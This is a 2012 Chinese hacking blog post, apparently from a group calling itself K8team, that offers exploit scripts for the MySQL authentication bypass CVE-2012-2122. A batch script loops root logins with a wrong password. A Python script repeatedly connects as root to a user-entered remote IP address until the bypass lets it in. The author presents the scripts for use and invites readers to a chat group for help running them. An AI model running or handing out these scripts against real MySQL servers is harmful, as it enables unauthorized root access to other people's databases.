注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[原创]Mysql身份认证漏洞-EXP BAT版 + PYTHON版 256可成功一次那个  

2012-06-14 15:03:07|  分类: 0day漏洞 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |


漏洞信息:http://seclists.org/oss-sec/2012/q2/493

下面这个BAT 在漏洞刚出来的那天晚上 阿D问我测试了没
然后我正在看电视大改10点钟这样 随手写来 本地测试
当然改一下语句就成远程版  测试了好几个版本都木成功
 
@echo off
echo 正在测试Mysql身份认证漏洞及利用(CVE-2012-2122) 256次可成功一次
cd "C:\Program Files\MySQL\MySQL Server 5.1\bin"
mysql --user=root --password=k8team888
for /l %%i in (1,1,500) do mysql --user=root --password=k8team &echo k8test%%i
pause

远程python版 linux下   就下面这几句 简单的python  哥也一样会
不过下面这个确实是 直接拿的是老外的 居然还有人把玩意发到exp-db上

#!/usr/bin/python
import subprocess
 
ipaddr = raw_input("Enter the IP address of the mysql server: ")
 
while 1:
    subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()

测试效果图 虽然哥没成功

[原创]Mysql身份认证漏洞-EXP BAT版 + PYTHON版 256可成功一次那个 - 拉登哥哥 - K8拉登哥哥s Blog
 
[原创]Mysql身份认证漏洞-EXP BAT版 + PYTHON版 256可成功一次那个 - 拉登哥哥 - K8拉登哥哥s Blog

  若不懂使用上面的代码  可加入 K8搞基大队 超级群 里一同讨论
  评论这张
 
阅读(1727)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016